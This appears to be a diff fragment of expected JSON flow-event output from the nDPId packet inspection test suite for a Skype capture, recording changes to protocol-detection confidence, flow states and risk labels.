-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636301,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1431970648367,"flow_last_seen":1431970708411,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":11890,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970636301,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 